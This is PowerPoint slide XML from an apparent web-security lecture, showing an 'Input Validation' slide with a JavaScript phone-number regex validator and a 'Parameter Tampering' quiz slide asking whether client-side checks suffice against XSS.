              <a:t> other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>options.</a:t>
            </a:r>
            <a:endParaRPr sz="2933">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672839" y="150393"/>
            <a:ext cx="4847167" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1311250"/>
            <a:ext cx="10527453" cy="2152128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whether input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>follows </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whitelisted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pattern. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>if accepting a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>phone number </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript code to validate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-767" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS:</a:t>
            </a:r>
            <a:endParaRPr sz="3467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1645919" y="3502152"/>
          <a:ext cx="10222653" cy="1121662"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="154940">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4821767">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="566419">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4679527">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="276352">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1450"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>validatePhoneNumber</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>){</a:t>
                      </a:r>
                      <a:endParaRPr sz="1900">
                        <a:latin typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="F1F4FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0"/>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="1600">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnB w="12700">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84479">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="213360">
                        <a:lnSpc>
                          <a:spcPts val="1500"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>var </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>phoneNumberPattern</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-20" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>/^\(?(\d{3})\)?[-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>]?(\d{3})[-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-15" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>]?(\d{4})$/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-5" dirty="0">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1F4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84480">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="213360">
                        <a:lnSpc>
                          <a:spcPts val="1500"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>return</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>phoneNumberPattern</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" spc="-10" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1900" b="1" spc="-10" dirty="0">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1F4FF"/>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276351">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1500"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1900" b="1" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr sz="1900">
                        <a:latin typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:solidFill>
                      <a:srgbClr val="F1F4FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="3">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714587" y="4990320"/>
            <a:ext cx="10436012" cy="1617729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="just">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This ensures that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>phone number doesn’t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>contain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-767" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vector </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>works </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> easily</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3467" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> restricted.</a:t>
            </a:r>
            <a:endParaRPr sz="3467">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2814827" y="450638"/>
            <a:ext cx="6563360" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t>Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1618487"/>
            <a:ext cx="9874673" cy="1001983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Is the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>check in the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>previous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>function on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sufficient</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="3803261"/>
            <a:ext cx="979593" cy="803509"/>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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="507"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs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2814827" y="450638"/>
            <a:ext cx="6563360" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
